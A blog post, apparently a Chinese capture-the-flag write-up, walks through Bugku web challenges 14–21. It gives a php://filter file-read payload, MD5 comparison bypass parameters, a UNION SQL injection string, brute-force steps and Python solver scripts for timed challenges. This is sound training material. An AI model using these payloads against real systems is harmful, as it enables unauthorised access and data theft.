

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/kqcy.jpg">
  <link rel="icon" href="/img/kqcy.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>bugku web总结_1 - CompactDisk</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>CompactDisk's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                about me
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="bugku web总结_1">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-05-13 17:31" pubdate>
        May 13, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      39
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">bugku web总结_1</h1>
            
            <div class="markdown-body">
              <p>﻿## bugku web总结(14-24)</p>
<h4 id="web14"><a href="#web14" class="headerlink" title="web14:"></a>web14:</h4><p>打开题目，可以看到一个链接click me</p>
<p><img src="https://img-blog.csdnimg.cn/20210425101546603.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>点击后显示了index.php，可能提示flag存在index.php中</p>
<p><img src="https://img-blog.csdnimg.cn/20210425101612732.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>如上图我们还可以看到多了一个参数file，很像是文件包含，这里我们可以尝试使用php伪协议读取文件内容，放上一个介绍php伪协议的文章链接<a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000018991087">https://segmentfault.com/a/1190000018991087</a></p>
<p>构造payload：php://filter/read=convert.base64-encode/resource=index.php，其中read为读过滤器，此项为选填，这里选用了base64编码，防止无法直接传输，resource为必填，指定我们要读取的数据流</p>
<p>拿到一串base64编码</p>
<p><img src="https://img-blog.csdnimg.cn/20210425101638904.png#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>hackbar解码，可以看到源码中有一行注释，成功拿到flag</p>
<p><img src="https://img-blog.csdnimg.cn/20210425101704322.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="20210416183207599.png"></p>
<h4 id="web15"><a href="#web15" class="headerlink" title="web15:"></a>web15:</h4><p>打开之后提示输入5位密码</p>
<p><img src="https://img-blog.csdnimg.cn/2021042510174222.png#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>直接burp扔给intruder爆破，没什么好说的</p>
<p><img src="https://img-blog.csdnimg.cn/20210425101801225.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210425101822483.png#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h4 id="web16"><a href="#web16" class="headerlink" title="web16:"></a>web16:</h4><p>点开题目之后，给了一串md5值</p>
<p><img src="https://img-blog.csdnimg.cn/20210425101839747.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>解密之后显示空密码，右键查看源代码也看不到什么特殊东西</p>
<p><img src="https://img-blog.csdnimg.cn/20210425101900144.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>结合题目的名字，叫做备份是个好习惯，我们目录扫描一波后台，看看能不能发现备份文件</p>
<p>不出所料，有一个index.php.bak文件</p>
<p><img src="https://img-blog.csdnimg.cn/20210425101918491.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>我们访问它，将其下载下来，源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">/**</span><br><span class="hljs-comment"></span><br><span class="hljs-comment"> * Created by PhpStorm.</span><br><span class="hljs-comment"> * User: Norse</span><br><span class="hljs-comment"> * Date: 2017/8/6</span><br><span class="hljs-comment"> * Time: 20:22</span><br><span class="hljs-comment">   */</span><br><br><span class="hljs-keyword">include_once</span> <span class="hljs-string">&quot;flag.php&quot;</span>;    <span class="hljs-comment">//告诉我们flag文件</span><br>ini_set(<span class="hljs-string">&quot;display_errors&quot;</span>, <span class="hljs-number">0</span>);  <span class="hljs-comment">//ini_set设置php.ini选项，此处参数display_error为报错回显</span><br><span class="hljs-variable">$str</span> = strstr(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;REQUEST_URI&#x27;</span>], <span class="hljs-string">&#x27;?&#x27;</span>);<span class="hljs-comment">//$_SERVER[&#x27;REQUEST_URI&#x27;]回显当前路径，strstr函  												数为截取字符串，如此处为从?截取到字符串结束为止</span><br><span class="hljs-variable">$str</span> = substr(<span class="hljs-variable">$str</span>,<span class="hljs-number">1</span>);      <span class="hljs-comment">//substr也是截取字符串，此处表示从第一个开始(扔掉?)，截取到结尾</span><br><span class="hljs-variable">$str</span> = str_replace(<span class="hljs-string">&#x27;key&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>,<span class="hljs-variable">$str</span>); <span class="hljs-comment">//将变量str中的key替换为空</span><br>parse_str(<span class="hljs-variable">$str</span>);      <span class="hljs-comment">//parse_str函数将括号内的赋值语句直接转化为变量，并给它赋值，比如								parse_str(a=1)，就会创建一个变量a，并赋值为1</span><br><span class="hljs-keyword">echo</span> md5(<span class="hljs-variable">$key1</span>);	<span class="hljs-comment">//变量key1md5加密</span><br><br><span class="hljs-keyword">echo</span> md5(<span class="hljs-variable">$key2</span>);	<span class="hljs-comment">//同上</span><br><span class="hljs-keyword">if</span>(md5(<span class="hljs-variable">$key1</span>) == md5(<span class="hljs-variable">$key2</span>) &amp;&amp; <span class="hljs-variable">$key1</span> !== <span class="hljs-variable">$key2</span>)&#123;	<span class="hljs-comment">//md5加密后的key1和key2相等，原值不相等</span><br>    <span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag</span>.<span class="hljs-string">&quot;取得flag&quot;</span>;	<span class="hljs-comment">//打印flag</span><br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>这里既要key1和key2的md5值相等，原值又不能相等，有两个思路，一是利用md5()函数对数组不起效，将两个变量以数组形式输入，这样两个md5()都返回null，满足相等条件</p>
<p>payload：?kekeyy1[]=12agh&amp;kekeyy2[]=123ccnjgg</p>
<p>二是利用php在处理长的字符串时会转换成科学计数法，我们可以找两个md5值是0e开头的，它在解析时会当做0的xx次方，都是0，满足条件</p>
<p>payload：?kekeyy1=240610708&amp;kekeyy2=s155964671a</p>
<h4 id="web17"><a href="#web17" class="headerlink" title="web17:"></a>web17:</h4><p>点开题目之后，给了一个成绩查询页面</p>
<p><img src="https://img-blog.csdnimg.cn/20210425101943849.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>很自然的想到sql注入，经测试是个字符型的，无任何过滤，没啥好说的，手注、sqlmap均可</p>
<p>最后得到flag，payload：0’ union select 1,2,3,skctf_flag from fl4g#</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102005106.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h4 id="web18："><a href="#web18：" class="headerlink" title="web18："></a>web18：</h4><p>点开题目之后，给出一个算式，让我们2s给出结果</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102029992.png#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>很显然手工做不到，但是可以借助脚本获取数值之后计算传参，拿到flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests <span class="hljs-comment">#引入request库</span><br><span class="hljs-keyword">import</span> re 		<span class="hljs-comment">#引入re库</span><br>url = <span class="hljs-string">&#x27;&#x27;&#x27;http://114.67.246.176:10736/&#x27;&#x27;&#x27;</span><br>s = requests.session()  <span class="hljs-comment">#用session会话保持表达式</span><br>retuen = s.get(url)<br>equation = re.search(<span class="hljs-string">r&#x27;(\d+[+\-*])+(\d+)&#x27;</span>,retuen.text).group()<br>result = <span class="hljs-built_in">eval</span>(equation)	<span class="hljs-comment">#eval()函数用来执行一个字符串表达式,并返回表达式的值。</span><br><br>key = &#123;<span class="hljs-string">&#x27;value&#x27;</span>:result&#125;<span class="hljs-comment">#创建一个字典类型用于传参</span><br>flag = s.post(url,data=key)<span class="hljs-comment">#用post方法传上去</span><br><br><span class="hljs-built_in">print</span>(flag.text)<br></code></pre></td></tr></table></figure>

<h4 id="web19："><a href="#web19：" class="headerlink" title="web19："></a>web19：</h4><p>打开题目之后，会提示我们快一点，bp抓包查看返回信息，可以在header中看到一串类似flag的东西</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102051662.png#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>base64两次解密后会变成一串数字，提交上去也不对，把请求包再send一次，会发现flag会变，好吧，确实速度要快，和上一题基本一个思路，下面给出脚本代码</p>
<figure class="highlight processing"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs processing"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> base64<br>url = <span class="hljs-string">&quot;http://114.67.246.176:17056/&quot;</span><br>r = requests.Session()<br>headers = r.<span class="hljs-built_in">get</span>(url).headers<br>str1 = base64.b64decode(headers[<span class="hljs-string">&#x27;flag&#x27;</span>])<br>str2 = base64.b64decode(repr(str1).<span class="hljs-built_in">split</span>(<span class="hljs-string">&#x27;:&#x27;</span>)[<span class="hljs-number">1</span>]) # repr()函数将对象转化为供解释器读取的形式(Bety-		&gt;<span class="hljs-built_in">str</span>)<br>data = &#123;<span class="hljs-string">&#x27;margin&#x27;</span>:str2&#125;<br><span class="hljs-built_in">print</span> (r.post(url,data).<span class="hljs-built_in">text</span>)<br></code></pre></td></tr></table></figure>

<p>python3运行，成功拿到flag</p>
<h4 id="web20："><a href="#web20：" class="headerlink" title="web20："></a>web20：</h4><p>打开题目之后，会给出一长串不明意义的字符串，右键查看源码也并没有发现什么</p>
<p><img src="https://img-blog.csdnimg.cn/2021042510211069.png#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>观察url，有两个参数，一个line是空的没有赋值，另一个filename给了一串base64编码：a2V5cy50eHQ=，解码之后得到keys.txt，将文件名换为同样base64加密后的index.php，可以看到一个标签”&lt;?php”，可以确定此处能够查看源码，依次改变line值，最后可以读出整段源码，如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>error_reporting(<span class="hljs-number">0</span>);<br><span class="hljs-variable">$file</span>=base64_decode(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;filename&#x27;</span>])?<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;filename&#x27;</span>]:<span class="hljs-string">&quot;&quot;</span>);<br><span class="hljs-variable">$line</span>=<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;line&#x27;</span>])?intval(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;line&#x27;</span>]):<span class="hljs-number">0</span>;<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$file</span>==<span class="hljs-string">&#x27;&#x27;</span>) header(<span class="hljs-string">&quot;location:index.php?line=&amp;filename=a2V5cy50eHQ=&quot;</span>);<br><span class="hljs-variable">$file_list</span> = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;0&#x27;</span> =&gt;<span class="hljs-string">&#x27;keys.txt&#x27;</span>,<span class="hljs-string">&#x27;1&#x27;</span> =&gt;<span class="hljs-string">&#x27;index.php&#x27;</span>,);<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&#x27;margin&#x27;</span>]) &amp;&amp; <span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&#x27;margin&#x27;</span>]==<span class="hljs-string">&#x27;margin&#x27;</span>)&#123; <span class="hljs-comment">#当cookie为margin=margin时</span><br>	<span class="hljs-variable">$file_list</span>[<span class="hljs-number">2</span>]=<span class="hljs-string">&#x27;keys.php&#x27;</span>;&#125;                    <span class="hljs-comment">#给file_list[2]增加keys.php</span><br><span class="hljs-keyword">if</span>(in_array(<span class="hljs-variable">$file</span>, <span class="hljs-variable">$file_list</span>))&#123;<br>	<span class="hljs-variable">$fa</span> = file(<span class="hljs-variable">$file</span>);<br>	<span class="hljs-keyword">echo</span> <span class="hljs-variable">$fa</span>[<span class="hljs-variable">$line</span>];&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>从代码中可以看到，当cookie为margin=margin时，会在file_list[2]数组中增加keys.php的值</p>
<p>我们照做，使用hackbar或burp抓包添加cookie值后，查看返回包或返回页面源码，即可拿到flag</p>
<h4 id="web21："><a href="#web21：" class="headerlink" title="web21："></a>web21：</h4><p>点开之后没看到啥提示信息</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102136453.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>右键查看源码，可以看到提示了一个1p.html</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102204250.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>直接访问此页面的话，会跳转至bugku的首页，我们用burp抓包，将请求页面替换为1p.html</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102223165.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>返回的数据包中包含一串url编码</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">HTML</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">HEAD</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">SCRIPT</span> <span class="hljs-attr">LANGUAGE</span>=<span class="hljs-string">&quot;Javascript&quot;</span>&gt;</span><br>&lt;!--<br><span class="javascript"><span class="hljs-keyword">var</span> Words =<span class="hljs-string">&quot;%3Cscript%3Ewindow.location.href%3D&#x27;http%3A%2F%2Fwww.bugku.com&#x27;%3B%3C%2Fscript%3E%20%0A%3C!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCUzRDEnKSUzQiUwQSUwOWV4aXQoKSUzQiUwQSU3RCUwQSUyNGlkJTNEJTI0X0dFVCU1QidpZCclNUQlM0IlMEElMjRhJTNEJTI0X0dFVCU1QidhJyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJ2InJTVEJTNCJTBBaWYoc3RyaXBvcyglMjRhJTJDJy4nKSklMEElN0IlMEElMDllY2hvJTIwJ25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJyUzQiUwQSUwOXJldHVybiUyMCUzQiUwQSU3RCUwQSUyNGRhdGElMjAlM0QlMjAlNDBmaWxlX2dldF9jb250ZW50cyglMjRhJTJDJ3InKSUzQiUwQWlmKCUyNGRhdGElM0QlM0QlMjJidWdrdSUyMGlzJTIwYSUyMG5pY2UlMjBwbGF0ZWZvcm0hJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuKCUyNGIpJTNFNSUyMGFuZCUyMGVyZWdpKCUyMjExMSUyMi5zdWJzdHIoJTI0YiUyQzAlMkMxKSUyQyUyMjExMTQlMjIpJTIwYW5kJTIwc3Vic3RyKCUyNGIlMkMwJTJDMSkhJTNENCklMEElN0IlMEElMDklMjRmbGFnJTIwJTNEJTIwJTIyZmxhZyU3QioqKioqKioqKioqJTdEJTIyJTBBJTdEJTBBZWxzZSUwQSU3QiUwQSUwOXByaW50JTIwJTIybmV2ZXIlMjBuZXZlciUyMG5ldmVyJTIwZ2l2ZSUyMHVwJTIwISEhJTIyJTNCJTBBJTdEJTBBJTBBJTBBJTNGJTNF--%3E&quot;</span> </span><br><span class="javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">OutWord</span>(<span class="hljs-params"></span>)</span></span><br>&#123;<br><span class="javascript"><span class="hljs-keyword">var</span> NewWords;</span><br><span class="javascript">NewWords = <span class="hljs-built_in">unescape</span>(Words);</span><br><span class="javascript"><span class="hljs-built_in">document</span>.write(NewWords);</span><br>&#125; <br>OutWord();<br><span class="javascript"><span class="hljs-comment">// --&gt;</span></span><br><span class="hljs-tag">&lt;/<span class="hljs-name">SCRIPT</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">HEAD</span>&gt;</span><br><br><span class="hljs-tag">&lt;<span class="hljs-name">BODY</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">BODY</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">HTML</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>解码之后得到一串注释</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs xml">&quot;<span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript"><span class="hljs-built_in">window</span>.location.href=<span class="hljs-string">&#x27;http://www.bugku.com&#x27;</span>;</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span> <br><span class="hljs-comment">&lt;!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCUzRDEnKSUzQiUwQSUwOWV4aXQoKSUzQiUwQSU3RCUwQSUyNGlkJTNEJTI0X0dFVCU1QidpZCclNUQlM0IlMEElMjRhJTNEJTI0X0dFVCU1QidhJyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJ2InJTVEJTNCJTBBaWYoc3RyaXBvcyglMjRhJTJDJy4nKSklMEElN0IlMEElMDllY2hvJTIwJ25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJyUzQiUwQSUwOXJldHVybiUyMCUzQiUwQSU3RCUwQSUyNGRhdGElMjAlM0QlMjAlNDBmaWxlX2dldF9jb250ZW50cyglMjRhJTJDJ3InKSUzQiUwQWlmKCUyNGRhdGElM0QlM0QlMjJidWdrdSUyMGlzJTIwYSUyMG5pY2UlMjBwbGF0ZWZvcm0hJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuKCUyNGIpJTNFNSUyMGFuZCUyMGVyZWdpKCUyMjExMSUyMi5zdWJzdHIoJTI0YiUyQzAlMkMxKSUyQyUyMjExMTQlMjIpJTIwYW5kJTIwc3Vic3RyKCUyNGIlMkMwJTJDMSkhJTNENCklMEElN0IlMEElMDklMjRmbGFnJTIwJTNEJTIwJTIyZmxhZyU3QioqKioqKioqKioqJTdEJTIyJTBBJTdEJTBBZWxzZSUwQSU3QiUwQSUwOXByaW50JTIwJTIybmV2ZXIlMjBuZXZlciUyMG5ldmVyJTIwZ2l2ZSUyMHVwJTIwISEhJTIyJTNCJTBBJTdEJTBBJTBBJTBBJTNGJTNF--&gt;</span>&quot;<br></code></pre></td></tr></table></figure>

<p>将注释base64解码，终于得到源码</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs stata">&quot;;<span class="hljs-keyword">if</span>(!<span class="hljs-variable">$_GET</span>[&#x27;id&#x27;])     <span class="hljs-comment">//变量id不为空</span><br>&#123;<br>	header(&#x27;Location: hello.php?id=1&#x27;);<br>	<span class="hljs-keyword">exit</span>();<br>&#125;<br><span class="hljs-variable">$id</span>=<span class="hljs-variable">$_GET</span>[&#x27;id&#x27;];<br><span class="hljs-variable">$a</span>=<span class="hljs-variable">$_GET</span>[&#x27;a&#x27;];<br><span class="hljs-variable">$b</span>=<span class="hljs-variable">$_GET</span>[&#x27;b&#x27;];<br><span class="hljs-keyword">if</span>(stripos(<span class="hljs-variable">$a</span>,&#x27;.&#x27;))   <span class="hljs-comment">//变量a中不含有.</span><br>&#123;<br>	echo &#x27;<span class="hljs-keyword">no</span> <span class="hljs-keyword">no</span> <span class="hljs-keyword">no</span> <span class="hljs-keyword">no</span> <span class="hljs-keyword">no</span> <span class="hljs-keyword">no</span> <span class="hljs-keyword">no</span>&#x27;;<br>	<span 